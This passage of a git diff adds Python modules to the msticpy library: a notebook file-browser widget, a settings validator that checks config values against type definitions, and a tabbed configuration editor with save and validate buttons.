+        Initialize the class for path and with optional callback.
+
+        Parameters
+        ----------
+        path : str, optional
+            Path to open at, by default "."
+        select_cb : Callable[[str], Any], optional
+            Callback function, by default None. This is executed
+            when the user hits the "Select File" button. The function
+            is passed the path of the selected file.
+
+        """
+        self.current_folder = Path(path).resolve()
+        self.file: Optional[str] = None
+        self.action = select_cb
+
+        file_layout = widgets.Layout(height="200px", width="45%")
+        self.select_file = widgets.Select(description="Files", layout=file_layout)
+        folder_layout = widgets.Layout(height="150px", width="99%")
+        self.select_folder = widgets.Select(description="Folders", layout=folder_layout)
+
+        self.btn_open = widgets.Button(description="Select File")
+        self.btn_f_nav = widgets.Button(description="Open folder")
+        self.txt_path = widgets.Text(
+            description="Path",
+            value=str(self.current_folder),
+            layout=widgets.Layout(width="75%"),
+        )
+
+        style_indent = {"description_width": "150px"}
+        self.select_search = widgets.Select(
+            description="Results",
+            layout=self.no_border_layout("75%"),
+            style=style_indent,
+        )
+        self.select_search.observe(self._select_search_file, names="value")
+        self.lbl_search = widgets.Label(value="Search for file in current path")
+
+        self.txt_search = widgets.Text(
+            description="Search pattern",
+            layout=widgets.Layout(width="50%"),
+            style=style_indent,
+            continuous_update=False,
+        )
+        self.txt_search.observe(self._search, "value")
+        self.btn_search = widgets.Button(description="Search")
+        self.btn_search.on_click(self._search)
+        hb_search = widgets.HBox([self.txt_search, self.btn_search])
+        vb_search = widgets.VBox([self.lbl_search, hb_search, self.select_search])
+        self.accd_search = widgets.Accordion(children=[vb_search])
+        self.accd_search.set_title(0, "Search")
+        self.accd_search.selected_index = None
+
+        self.txt_path.continuous_update = False
+        self.txt_path.observe(self._enter_folder, "value")
+        self.btn_open.on_click(self._return_file)
+        self.btn_f_nav.on_click(self._open_folder)
+        self.select_file.observe(self._select_file, names="value")
+
+        self._open_folder(tgt_folder=self.current_folder)
+
+        vb_folder_nav = widgets.VBox(
+            [self.select_folder, self.btn_f_nav], layout=widgets.Layout(width="30%")
+        )
+        hb_files_folders = widgets.HBox(
+            [vb_folder_nav, self.select_file], layout=self.border_layout("98%")
+        )
+
+        hb_search = widgets.HBox([self.txt_search, self.btn_search])
+        vb_search = widgets.VBox([self.lbl_search, hb_search, self.select_search])
+
+        self.layout = widgets.VBox(
+            [self.txt_path, hb_files_folders, self.accd_search, self.btn_open],
+            layout=self.border_layout("98%"),
+        )
+
+    def _enter_folder(self, event):
+        """Handle event from folder text box when pressing ENTER."""
+        del event
+        if Path(self.txt_path.value).is_dir():
+            self._open_folder(tgt_folder=self.txt_path.value)
+
+    def _open_folder(self, btn=None, tgt_folder=None):
+        """Handle event from Open Folder button - change directory."""
+        del btn
+        if not tgt_folder:
+            tgt_folder = self.select_folder.value
+        if tgt_folder == self.PARENT:
+            tgt_folder = self.current_folder.parent
+        if tgt_folder:
+            self.current_folder = (
+                Path(self.current_folder).joinpath(tgt_folder).resolve()
+            )
+            self.txt_path.value = str(self.current_folder)
+            folders, files = self.read_folder(self.current_folder)
+            self.select_folder.options = self.get_folder_list(folders)
+            self.select_file.options = files
+
+    def _select_file(self, change):
+        """Handle event from select file button."""
+        selected_file = change.get("new")
+        self.file = str(Path(self.current_folder).joinpath(selected_file).resolve())
+
+    def _select_search_file(self, change):
+        """Handle event for selection of file from search UI."""
+        self.file = change.get("new")
+
+    def _return_file(self, btn):
+        """Execute callback on selected file if one is defined."""
+        del btn
+        if self.action:
+            self.action(self.file)
+
+    @staticmethod
+    def read_folder(folder: str) -> Tuple[List[str], List[str]]:
+        """
+        Return folder contents.
+
+        Parameters
+        ----------
+        folder : str
+            Folder path.
+
+        Returns
+        -------
+        Tuple[List[str], List[str]]
+            List of folders and files in the folder.
+
+        """
+        contents = list(Path(folder).glob("*"))
+        files = [file.parts[-1] for file in contents if file.is_file()]
+        folders = [fld.parts[-1] for fld in contents if fld.is_dir()]
+        return folders, files
+
+    def get_folder_list(self, folders: List[str]) -> List[str]:
+        """Return sorted list of folders with '..' inserted if not root."""
+        if self.current_folder != Path(self.current_folder.parts[0]):
+            return [self.PARENT, *(sorted(folders))]
+        return sorted(folders)
+
+    def _search(self, btn):
+        """Handle event for search button."""
+        del btn
+        if self.txt_search.value:
+            found_files: Optional[List[Path]] = None
+            while found_files is None:
+                try:
+                    found_files = list(self.current_folder.rglob(self.txt_search.value))
+                except FileNotFoundError:
+                    pass
+            self.select_search.options = [
+                str(file) for file in found_files if file.exists()
+            ]
diff --git a/msticpy/config/mp_config_control.py b/msticpy/config/mp_config_control.py
new file mode 100644
index 000000000..385145299
--- /dev/null
+++ b/msticpy/config/mp_config_control.py
@@ -0,0 +1,629 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MP Config Control Class."""
+from collections import namedtuple
+import pkgutil
+import re
+from typing import Any, Dict, List, Optional, Tuple, Union
+
+import ipywidgets as widgets
+import yaml
+
+from ..common.utility import is_valid_uuid
+from .._version import VERSION
+from .ce_common import print_debug, py_to_widget, widget_to_py
+from .comp_edit import SettingsControl
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+STORE_TEXT = "Text"
+STORE_ENV_VAR = "EnvironmentVar"
+STORE_KEYVAULT = "KeyVault"
+STORE_OPT = "StoreType"
+
+ValidtnResult = namedtuple("ValidtnResult", "result, status")
+_VALID_SUCESS = "Validation succeeded"
+
+
+class MpConfigControls:
+    """Msticpy configuration and settings database."""
+
+    def __init__(
+        self, mp_config_def: Dict[str, Any], mp_config: Optional[Dict[str, Any]] = None
+    ):
+        """
+        Return an instance of MpConfigControls.
+
+        Parameters
+        ----------
+        mp_config_def : Dict[str, Any]
+            Msticpy config setting definitions.
+        mp_config : Optional[Dict[str, Any]], optional
+            Msticpy Settings dictionary, by default None
+
+        """
+        self.mp_config = mp_config or {}
+        self._raw_config_defn = mp_config_def
+        self.config_defn = self._convert_mp_config(mp_config_def)
+        self.controls = self._create_ctrl_dict(self.mp_config)
+
+        if "AzureCLI" in self.mp_config:
+            if "DataProviders" not in self.mp_config:
+                self.mp_config["DataProviders"] = {}
+            self.mp_config["DataProviders"]["AzureCLI"] = self.mp_config["AzureCLI"]
+
+    @staticmethod
+    def _get_elem_from_path(path, member_dict: Dict[str, Any]):
+        """Return an item at the path from `member_dict`."""
+        paths = path.split(".")
+        current_elem = member_dict
+        for elem in paths:
+            next_elem = current_elem.get(elem)
+            if next_elem is None:
+                return next_elem
+            current_elem = next_elem
+        return current_elem
+
+    def _set_elem_at_path(
+        self, path: str, member_dict: Dict[str, Any], value: Any, create: bool = True
+    ):
+        """Set item at the path from `member_dict` to `value`."""
+        path_elems = path.rsplit(".", maxsplit=1)
+        parent_path = path_elems[0]
+        parent = self._get_elem_from_path(parent_path, member_dict)
+        if parent is not None:
+            if len(path_elems) > 1:
+                parent[path_elems[1]] = value
+            else:
+                member_dict[parent_path] = value
+        elif create:
+            # if an element in the path doesn't exist, create any needed
+            if len(path_elems) == 1:
+                member_dict[parent_path] = value
+                return
+            tgt_key = path_elems[1]
+            current_elem = member_dict
+            for elem in parent_path.split("."):
+                next_elem = current_elem.get(elem)
+                if next_elem is None:
+                    next_elem = {}
+                    current_elem[elem] = next_elem
+                current_elem = next_elem
+            current_elem[tgt_key] = value
+            print_debug("set", parent_path, tgt_key, value)
+
+    def _del_elem_at_path(self, path: str, member_dict: Dict[str, Any]):
+        """Delete an item at `path`."""
+        parent_path, tgt_key = path.rsplit(".", maxsplit=1)
+        parent = self._get_elem_from_path(parent_path, member_dict)
+        if parent is not None and tgt_key in parent:
+            del parent[tgt_key]
+
+    def get_value(self, path: str) -> Any:
+        """Return setting value at `path`."""
+        return self._get_elem_from_path(path, self.mp_config)
+
+    def set_value(self, path: str, value: Any):
+        """Set setting value at path to `value`."""
+        self._set_elem_at_path(path, self.mp_config, value)
+
+    def del_value(self, path: str, keep_ctrl: bool = False):
+        """Delete setting item at `path`."""
+        self._del_elem_at_path(path, self.mp_config)
+        if not keep_ctrl:
+            self.del_control(path)
+
+    def get_control(self, path: str) -> Any:
+        """Return the control stored at `path`."""
+        return self._get_elem_from_path(path, self.controls)
+
+    def set_control(self, path: str, control):
+        """Set the control stored at `path`."""
+        print_debug("set_control", path)
+        self._set_elem_at_path(path, self.controls, value=control)
+
+    def del_control(self, path: str):
+        """Delete the control stored at `path`."""
+        self._del_elem_at_path(path, self.controls)
+
+    def get_defn(self, path: str) -> Union[Dict[str, Any], Tuple[str, Any]]:
+        """Return the setting definition at `path`."""
+        defn = self._get_elem_from_path(path, self.config_defn)
+        if defn is not None:
+            return defn
+        if path.startswith("AzureSentinel.Workspaces"):
+            path = re.sub(
+                r"(?P<root>AzureSentinel\.Workspaces\.)([^.]+)", r"\1Default", path
+            )
+        return self._get_elem_from_path(path, self.config_defn)
+
+    def rename_path(self, old_path: str, new_path: str):
+        """Rename a setting from `old_path` to `new_path`."""
+        old_path_elems = old_path.rsplit(".", maxsplit=1)
+        new_path_elems = new_path.rsplit(".", maxsplit=1)
+        if (
+            old_path_elems[0] != new_path_elems[0]
+            or len(old_path_elems) == 1
+            or len(new_path_elems) == 1
+        ):
+            raise ValueError(
+                "Can only rename the bottom element of paths", old_path, new_path
+            )
+        path_root = old_path_elems[0]
+        src_key = old_path_elems[1]
+        tgt_key = new_path_elems[1]
+        for setting_dict in (self.mp_config, self.controls):
+            parent_elem = self._get_elem_from_path(path_root, setting_dict)
+            parent_elem[tgt_key] = parent_elem.get(src_key)
+            if src_key in parent_elem:
+                del parent_elem[src_key]
+
+    def populate_ctrl_values(self, path: str):
+        """Populate control at `path` from settings at `path`."""
+        print_debug("populate_ctrl_values", path)
+        self._set_ctrl_values(path)
+
+    def _set_ctrl_values(self, path: str):
+        """Recursively set settings from control values."""
+        ctrl_tree = self.get_control(path)
+        if isinstance(ctrl_tree, widgets.Widget):
+            print_debug("_set_ctrl_values - widget", ctrl_tree)
+            curr_value = py_to_widget(self.get_value(path), ctrl=ctrl_tree)
+            if curr_value:
+                ctrl_tree.value = curr_value
+        elif isinstance(ctrl_tree, SettingsControl):
+            print_debug(
+                "_set_ctrl_values - _SettingsControl",
+                ctrl_tree,
+                ctrl_tree.value,
+                path,
+                self.get_value(path),
+            )
+            curr_value = self.get_value(path)
+            if curr_value:
+                ctrl_tree.value = curr_value
+        elif isinstance(ctrl_tree, dict):
+            for key in ctrl_tree:
+                self._set_ctrl_values(f"{path}.{key}")
+
+    def save_ctrl_values(self, path: str):
+        """Save the values in the control at `path` to settings."""
+        self.set_value(path, self._get_ctrl_values(path))
+
+    def _get_ctrl_values(self, path: str):
+        """Recursively save values in the control at `path` to settings."""
+        ctrl_tree = self.get_control(path)
+        print_debug(
+            type(ctrl_tree),
+            "instance check",
+            isinstance(ctrl_tree, (widgets.Widget, SettingsControl)),
+        )
+        if isinstance(ctrl_tree, (widgets.Widget, SettingsControl)):
+            return widget_to_py(ctrl_tree)
+        if isinstance(ctrl_tree, dict):
+            return {key: self._get_ctrl_values(f"{path}.{key}") for key in ctrl_tree}
+        raise ValueError(f"No control found at path {path}")
+
+    def _create_ctrl_dict(self, config_dict):
+        """Create a blank control dictionary from settings."""
+        ctrl_dict = config_dict.copy()
+        for name, val in ctrl_dict.items():
+
+            if (
+                isinstance(val, dict)
+                and STORE_KEYVAULT not in val
+                and STORE_ENV_VAR not in val
+            ):
+                ctrl_dict[name] = self._create_ctrl_dict(val)
+            else:
+                ctrl_dict[name] = None
+        return ctrl_dict
+
+    def validate_all_settings(self, show_all: bool = False) -> List[ValidtnResult]:
+        """
+        Validate settings against definitions.
+
+        Parameters
+        ----------
+        show_all : bool, optional
+            Show success validations as well as failures, by default False
+
+        Returns
+        -------
+        List[ValidtnResult]
+            List of validation results:
+            bool - True == valid
+            status - validation result description
+
+        """
+        results = []
+        for key in self.mp_config:
+            results.extend(self.validate_setting(path=key, show_all=show_all))
+        return results
+
+    def validate_setting(
+        self, path: str, defn_path: Optional[str] = None, show_all: bool = False
+    ) -> List[ValidtnResult]:
+        """
+        Validate settings against definitions for a specific path.
+
+        Parameters
+        ----------
+        path : str
+            The setting path
+        defn_path : Optional[str], optional
+            The definition path, by default None
+            Unless, specified this is the same as the setting path
+        show_all : bool, optional
+            Return successful as well as failed validation results
+            , by default False
+
+        Returns
+        -------
+        List[ValidtnResult]
+            List of validation results:
+            bool - True == valid
+            status - validation result description
+
+        """
+        results = self._validate_setting_at_path(path=path, defn_path=defn_path)
+        if isinstance(results, tuple):
+            return [results] if show_all or not results[0] else []
+        if isinstance(results, list):
+            up_results = self._unpack_lists(results)
+            return [res for res in up_results if not res[0] or show_all]
+        return [ValidtnResult(True, "No validation results found")]
+
+    def _unpack_lists(self, res_list: List[Any]) -> List[ValidtnResult]:
+        """Unpack nested lists into a single list."""
+        results = []
+        for item in res_list:
+            if isinstance(item, list):
+                results.extend(self._unpack_lists(item))
+            else:
+                results.append(item)
+        return results
+
+    # pylint: disable=too-many-return-statements
+    def _validate_setting_at_path(
+        self, path: str, defn_path: Optional[str] = None, index: Optional[int] = None
+    ) -> Union[ValidtnResult, List[Union[ValidtnResult, List[Any]]]]:
+        """Recursively validate settings at path."""
+        defn_path = defn_path or path
+        conf_defn = self.get_defn(defn_path)
+        setting = self.get_value(path)
+        # to support recursive calls on members of lists (in the
+        # if isinstance(conf_defn, list) section) we need to pull out
+        # which item we're testing here
+        if index is not None and setting is not None:
+            setting = setting[index]
+
+        # If we don't have a definition, there's nothing to validate against.
+        if not conf_defn:
+            return ValidtnResult(True, f"No definition for path '{path}'")
+
+        # If this is None and we're not at a leaf setting it means the
+        # settings path doesn't exist, so bail here.
+        if not setting and not isinstance(conf_defn, tuple):
+            return ValidtnResult(True, f"No setting at path '{path}'")
+
+        # if the current defn node is a dict, then we need to recurse
+        # into it.
+        if isinstance(conf_defn, dict):
+            val_res = [
+                self._validate_setting_at_path(
+                    path=f"{path}.{key}", defn_path=f"{defn_path}.{key}"
+                )
+                for key in conf_defn
+            ]
+            return val_res[0] if len(val_res) == 1 else val_res
+
+        # if the defn is a list, we need to iterate through the members
+        if isinstance(conf_defn, list):
+            if isinstance(setting, list):
+                # if the setting value is a list - check each one
+                val_res = [
+                    self._validate_setting_at_path(path, defn_path, index=idx)
+                    for idx, _ in enumerate(setting)
+                ]
+                return val_res[0] if len(val_res) == 1 else val_res
+            # Otherwise assume that we are already checking an item in
+            # the list (recusing) - so we need to pull the defn from the
+            # first item in the definition list
+            conf_defn = conf_defn[0]
+
+        # If the defn is a tuple we've reached a leaf node with a true
+        # definition
+        if isinstance(conf_defn, tuple):
+            val_type, val_opts = conf_defn
+            validator = _VALIDATORS.get(val_type)
+            if validator:
+                return validator(setting, path, val_type, val_opts)
+            return ValidtnResult(True, "No validator for type '{val_type}'")
+
+        # If the conf definition is a literal value - compare directly
+        if conf_defn == setting:
+            return ValidtnResult(True, f"Value is valid at path '{path}'")
+
+        # Otherwise, we assume failure.
+        return ValidtnResult(False, f"Validation failed for path '{path}'")
+
+    def _yml_extract_type(self, conf_val):
+        """Extract type and options from definition."""
+        if not conf_val or "(" not in conf_val or ")" not in conf_val:
+            return "unknown", {}
+        val_type_match = re.match(
+            r"(?P<type>[^()]+)\((?P<params>.*)\)$", conf_val.strip()
+        )
+        val_type = val_type_match.groupdict().get("type")
+        val_param_str = val_type_match.groupdict().get("params", "")
+
+        if val_param_str:
+            val_params = {
+                param.split("=")[0].strip(): param.split("=")[1].strip()
+                for param in val_param_str.split(",")
+                if "=" in param
+            }
+            val_params = {
+                key: True if val == "True" else False if val == "False" else val
+                for key, val in val_params.items()
+            }
+        else:
+            val_params = {}
+        if "options" in val_params:
+            val_params["options"] = [
+                val.strip("'\"")
+                for val in val_params["options"].strip()[1:-1].split("; ")
+            ]
+        if "mp_defn_path" in val_params:
+            defn_path = val_params.pop("mp_defn_path").strip(" /\"'").replace("/", ".")
+            defn = self._get_elem_from_path(defn_path, self._raw_config_defn)
+            val_params["defn"] = defn
+        default_val = val_params.get("default", "")
+        if isinstance(default_val, str):
+            if default_val.strip().startswith("["):
+                # This is a default list - so we need to parse it
+                val_params["default"] = [
+                    val.strip("'\"")
+                    for val in re.split(r"\s*;\s*|\s*,\s*", default_val.strip()[1:-1])
+                ]
+            else:
+                val_params["default"] = default_val.strip("'\"")
+        return val_type, val_params
+
+    def _convert_mp_config(self, mp_conf_item):
+        """Convert definition dictionary to extract definitions."""
+        if isinstance(mp_conf_item, list):
+            return self._convert_mp_config_list(mp_conf_item)
+        if isinstance(mp_conf_item, dict):
+            return self._convert_mp_config_dict(mp_conf_item)
+        return mp_conf_item
+
+    def _convert_mp_config_dict(self, mp_conf_dict):
+        """Recursively convert definition dictionary to extract definitions."""
+        out_dict = {}
+        for key, val in mp_conf_dict.items():
+            if isinstance(val, dict):
+                out_dict[key] = self._convert_mp_config_dict(val)
+            elif isinstance(val, list):
+                out_dict[key] = self._convert_mp_config_list(val)
+            else:
+                key_type, opts = self._yml_extract_type(val)
+                out_dict[key] = val if key_type == "unknown" else (key_type, opts)
+        return out_dict
+
+    def _convert_mp_config_list(self, mp_conf_list):
+        """Recursively convert definition list to extract definitions."""
+        out_list = []
+        for val in mp_conf_list:
+            if isinstance(val, dict):
+                out_list.append(self._convert_mp_config_dict(val))
+            elif isinstance(val, list):
+                out_list.append(self._convert_mp_config_list(val))
+            else:
+                key_type, opts = self._yml_extract_type(val)
+                out_list.append(val if key_type == "unknown" else (key_type, opts))
+        return out_list
+
+
+def get_mpconfig_definitions() -> Dict[str, Any]:
+    """
+    Return the current msticpyconfig definition dictionary.
+
+    Returns
+    -------
+    Dict[str, Any]
+        msticpyconfig definition dictionary
+
+    Raises
+    ------
+    ValueError:
+        Could not load definitions from resources/mpconfig_defaults.yaml
+
+    """
+    pkg_root = __package__.split(".", maxsplit=1)[0]
+    file_bytes = pkgutil.get_data(pkg_root, "resources/mpconfig_defaults.yaml")
+    if file_bytes:
+        return yaml.safe_load(file_bytes)
+    raise ValueError("Could not load definitions from resources/mpconfig_defaults.yaml")
+
+
+# Supporting functions for MpConfigControls
+def _get_mssg(value, path):
+    return f"value '{value}', for setting at path '{path}'"
+
+
+def _is_none_and_not_required(value, val_type, val_opts):
+    if value is None or (val_type == "str" and not value):
+        return not val_opts.get("required", True)
+    return False
+
+
+def _validate_string(value, path, val_type, val_opts):
+    mssg = _get_mssg(value, path)
+    if _is_none_and_not_required(value, val_type, val_opts):
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    if not isinstance(value, str):
+        return ValidtnResult(
+            False, f"Value type {type(value)} should be type {val_type} - {mssg}"
+        )
+    if "options" in val_opts and value not in val_opts["options"]:
+        return ValidtnResult(
+            False,
+            f"Value {value} must be one of {', '.join(val_opts['options'])} - {mssg}",
+        )
+    if val_opts.get("format") == "uuid" and not is_valid_uuid(value):
+        return ValidtnResult(
+            False,
+            f"Value {value} should be a UUID - {mssg}",
+        )
+    return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+
+
+def _validate_bool(value, path, val_type, val_opts):
+    mssg = _get_mssg(value, path)
+    if _is_none_and_not_required(value, val_type, val_opts):
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    if not isinstance(value, bool):
+        return ValidtnResult(
+            False, f"Value type {type(value)} should be type {val_type} - {mssg}"
+        )
+    return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+
+
+def _validate_m_enum(value, path, val_type, val_opts):
+    mssg = _get_mssg(value, path)
+    if _is_none_and_not_required(value, val_type, val_opts):
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    if not isinstance(value, (str, list)):
+        return ValidtnResult(
+            False, f"Value type {type(value)} should be type {val_type} - {mssg}"
+        )
+    if "options" in val_opts:
+        if isinstance(value, str) and value not in val_opts["options"]:
+            return ValidtnResult(
+                False,
+                f"Value {value} must be one of {', '.join(val_opts['options'])} - {mssg}",
+            )
+        if not isinstance(value, list):
+            return ValidtnResult(
+                False,
+                f"Value '{value}' should be a string or list. "
+                + f"Must be one of {', '.join(val_opts['options'])} - {mssg}",
+            )
+        invalid_opts = [val for val in value if val not in val_opts["options"]]
+        if invalid_opts:
+            return ValidtnResult(
+                False,
+                f"Invalid values '{invalid_opts}' found. "
+                + f"Must be one of {', '.join(val_opts['options'])} - {mssg}",
+            )
+    return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+
+
+def _validate_txt_dict(value, path, val_type, val_opts):
+    mssg = _get_mssg(value, path)
+    if _is_none_and_not_required(value, val_type, val_opts):
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    if isinstance(value, dict):
+        for d_key, d_val in value.items():
+            if not isinstance(d_key, str):
+                return ValidtnResult(
+                    False,
+                    f"Key {d_key} of {value} must be a string - {mssg}",
+                )
+            if not isinstance(d_val, (str, int, bool)):
+                return ValidtnResult(
+                    False,
+                    f"Value {d_val} of key {d_key} in {value} must be a"
+                    + f" string, int or bool - {mssg}",
+                )
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    return ValidtnResult(False, f"Value {value} should be a dictionary - {mssg}")
+
+
+def _validate_list(value, path, val_type, val_opts):
+    mssg = _get_mssg(value, path)
+    if _is_none_and_not_required(value, val_type, val_opts):
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    if isinstance(value, list):
+        for item_val in value:
+            expected_type = val_opts.get("elem_type", "str")
+            val_type = type(item_val).__name__
+            if expected_type != val_type:
+                return ValidtnResult(
+                    False,
+                    f"Item {item_val} of {value} expected to be a {expected_type} - {mssg}",
+                )
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    return ValidtnResult(False, f"Value {value} should be a list - {mssg}")
+
+
+def _validate_defn(value, path, val_type, val_opts):
+    """
+    Validate a compound type definition.
+
+    We want to validate a value against a definition like:
+    ::
+        cred_key:
+            one_of:
+                - str: str()
+                - EnvironmentVar: str()
+                - KeyVault: str(required=False)
+
+    This only handles this type of definition and only looks at
+    the "required" flag in the options. We'll extend this checker if we
+    need to for other options.
+
+    """
+    mssg = _get_mssg(value, path)
+    if _is_none_and_not_required(value, val_type, val_opts):
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+
+    # This only handles "one_of" lists of alternatives
+    opt_list = val_opts.get("defn", {}).get("one_of")
+    if not opt_list:
+        return ValidtnResult(True, f"{_VALID_SUCESS} {mssg}")
+    # pull the definitions (val_type and val_opts) for each item into a dict
+    opt_dict = {next(iter(val.keys())): next(iter(val.values())) for val in opt_list}
+
+    # if the checked value is a string, validate the string
+    if isinstance(value, str) and "str" in opt_dict:
+        opt_v_opts = {"required": "required=False" not in opt_dict["str"]}
+        return _validate_string(value, path, "str", opt_v_opts)
+
+    # If the value is a dict
+    if isinstance(value, dict):
+        # We assume that the value is a dict with a single key
+        v_key, v_val = next(iter(value.items()))
+        # If the name is in the one_of dictionary names
+        if v_key in opt_dict:
+            # get the element type
+            opt_v_type = re.sub(r"\(.*\)", "", opt_dict[v_key])
+            # add "required=False" if that is the value options for this item
+            opt_v_opts = {"required": "required=False" not in opt_dict[v_key]}
+            # get the validator function for the option type and use that
+            # to check the actual value
+            _validator = _VALIDATORS.get(opt_v_type, _validate_string)
+            return _validator(v_val, f"{path}.{v_key}", opt_v_type, opt_v_opts)
+    # Otherwise the validation failed
+    return ValidtnResult(
+        False,
+        f"Value type {type(value)} does not match definition {val_opts['defn']} - {mssg}",
+    )
+
+
+_VALIDATORS = {
+    "str": _validate_string,
+    "enum": _validate_string,
+    "m_enum": _validate_m_enum,
+    "bool": _validate_bool,
+    "cred_key": _validate_defn,
+    "txt_dict": _validate_txt_dict,
+    "list": _validate_list,
+}
diff --git a/msticpy/config/mp_config_edit.py b/msticpy/config/mp_config_edit.py
new file mode 100644
index 000000000..37ec14397
--- /dev/null
+++ b/msticpy/config/mp_config_edit.py
@@ -0,0 +1,184 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from typing import Any, Dict, Optional, Union
+
+import ipywidgets as widgets
+from IPython.display import display
+
+from .._version import VERSION
+from .ce_azure_sentinel import CEAzureSentinel
+from .ce_data_providers import CEDataProviders
+from .ce_keyvault import CEKeyVault
+from .ce_azure import CEAzure
+from .ce_other_providers import CEOtherProviders
+from .ce_ti_providers import CETIProviders
+from .ce_user_defaults import CEAutoLoadComps, CEAutoLoadQProvs
+from .comp_edit import CompEditDisplayMixin, CompEditTabs, CETabControlDef
+from .mp_config_file import MpConfigFile
+from .mp_config_control import MpConfigControls, get_mpconfig_definitions
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class MpConfigEdit(CompEditDisplayMixin):
+    """Msticpy Configuration helper class."""
+
+    _TAB_DEFINITIONS = {
+        "MicrosoftSentinel": CEAzureSentinel,
+        "TI Providers": CETIProviders,
+        "Data Providers": CEDataProviders,
+        "GeoIP Providers": CEOtherProviders,
+        "Key Vault": CEKeyVault,
+        "Azure": CEAzure,
+        "Autoload QueryProvs": CEAutoLoadQProvs,
+        "Autoload Components": CEAutoLoadComps,
+    }
+
+    def __init__(
+        self,
+        settings: Optional[Union[Dict[str, Any], MpConfigFile, str]] = None,
+        conf_filepath: str = None,
+    ):
+        """
+        Initialize instance of MpConfigEdit.
+
+        Parameters
+        ----------
+        settings : Optional[Union[Dict[str, Any], MpConfigFile, str]], optional
+            settings can be one of the following:
+
+            - A dict of msticpyconfig settings
+            - An instance of MpConfigFile with loaded settings
+            - A file path to a msticpyconfig.yaml
+
+            If None, the settings will be read from the
+            default (via MSTICPYCONFIG variable)
+
+        conf_filepath : str
+            If settings are passed as MPConfigFile instance or a dict,
+            this parameter will override the file path used to save the
+            settings.
+            If settings is a file path, this parameter is ignored.
+
+        """
+        self._lbl_loading = widgets.Label(value="Loading. Please wait.")
+        display(self._lbl_loading)
+        if isinstance(settings, MpConfigFile):
+            self.mp_conf_file = MpConfigFile(settings=settings.settings)
+            if not self.mp_conf_file.current_file and conf_filepath:
+                self.mp_conf_file.current_file = conf_filepath
+        elif isinstance(settings, dict):
+            self.mp_conf_file = MpConfigFile(settings=settings)
+            if not self.mp_conf_file.current_file and conf_filepath:
+                self.mp_conf_file.current_file = conf_filepath
+        elif isinstance(settings, str):
+            self.mp_conf_file = MpConfigFile()
+            self.mp_conf_file.load_from_file(file=settings)
+        else:
+            self.mp_conf_file = MpConfigFile()
+            self.mp_conf_file.load_default()
+        self.tool_buttons: Dict[str, widgets.Widget] = {}
+        self._inc_loading_label()
+
+        # Get the settings definitions and Config controls object
+        mp_def_dict = get_mpconfig_definitions()
+        self.mp_controls = MpConfigControls(mp_def_dict, self.mp_conf_file.settings)
+        self._inc_loading_label()
+
+        # Set up the tabs
+        self.tab_ctrl = CompEditTabs(self._get_tab_definitions())
+        self._inc_loading_label()
+
+        self.txt_current_file = widgets.Text(
+            description="Conf File",
+            value=self.current_config_file,
+            layout=widgets.Layout(width="75%"),
+        )
+        self.btn_save = widgets.Button(
+            description="Save Settings",
+            tooltip="Save current settings to your config file.",
+        )
+        self.btn_save.on_click(self._save_file)
+        self.btn_validate = widgets.Button(
+            description="Validate Settings",
+            tooltip="Run basic sanity checks on current settings.",
+        )
+        self.btn_validate.on_click(self._validate_config)
+        self.cb_backup = widgets.Checkbox(description="Create backup", value=False)
+        vbox = widgets.VBox(
+            [
+                self.txt_current_file,
+                widgets.HBox([self.btn_save, self.cb_backup, self.btn_validate]),
+                self.mp_conf_file.viewer,
+            ]
+        )
+        self.layout = widgets.VBox([self.tab_ctrl.layout, vbox])
+        self._lbl_loading.layout.visibility = "hidden"
+
+    def _inc_loading_label(self):
+        self._lbl_loading.value = f"{self._lbl_loading.value}."
+
+    @property
+    def tab_names(self):
+        """Return a list of current tabs."""
+        return self.tab_ctrl.tab_names
+
+    @property
+    def controls(self):
+        """Return a list of current tab names and controls."""
+        return self.tab_ctrl.tab_controls
+
+    def set_tab(self, tab_name: Optional[str], index: int = 0):
+        """Programatically set the tab by name or index."""
+        self.tab_ctrl.set_tab(tab_name, index)
+
+    def _save_file(self, btn):
+        del btn
+        if self.txt_current_file.value:
+            self.mp_conf_file.save_to_file(
+                self.txt_current_file.value, backup=self.cb_backup.value
+            )
+
+    def _validate_config(self, btn):
+        del btn
+        self.mp_conf_file.validate_settings()
+        mpc_validation = self.mp_controls.validate_all_settings()
+        log_val_txt = self.mp_conf_file.txt_viewer.value
+        self.mp_conf_file.txt_viewer.value = "\n".join(
+            [
+                "Logical validation results",
+                "--------------------------",
+                log_val_txt,
+                "",
+                "Type validation results",
+                "-----------------------",
+                *(item.status for item in mpc_validation),
+            ]
+        )
+
+    def _create_data_tabs(self):
+        """Create all tab contents."""
+        self.tab_ctrl.tab.children = []
+        for name, (ctrl_cls, args) in self._get_tab_definitions().items():
+            ctrl = ctrl_cls(*args)
+            # add to tabs
+            self.tab_ctrl.add_tab(name, control=ctrl)
+            # Set these controls as named attributes on the object
+            setattr(self, name.replace(" ", "_"), ctrl)
+
+    def _get_tab_definitions(self) -> Dict[str, CETabControlDef]:
+        """Return tab definitions and arguments."""
+        return {
+            name: (cls, [self.mp_controls])
+            for name, cls in self._TAB_DEFINITIONS.items()
+        }
+
+    @property
+    def current_config_file(self):
+        """Return the currently loaded configuration file path."""
+        return self.mp_conf_file.current_file
diff --git a/msticpy/config/mp_config_file.py b/msticpy/config/mp_config_file.py
new file mode 100644
index 000000000..e414a13e2
--- /dev/null
+++ b/msticpy/config/mp_config_file.py
@@ -0,0 +1,336 @@
+# -------------------------------------------------------------------------
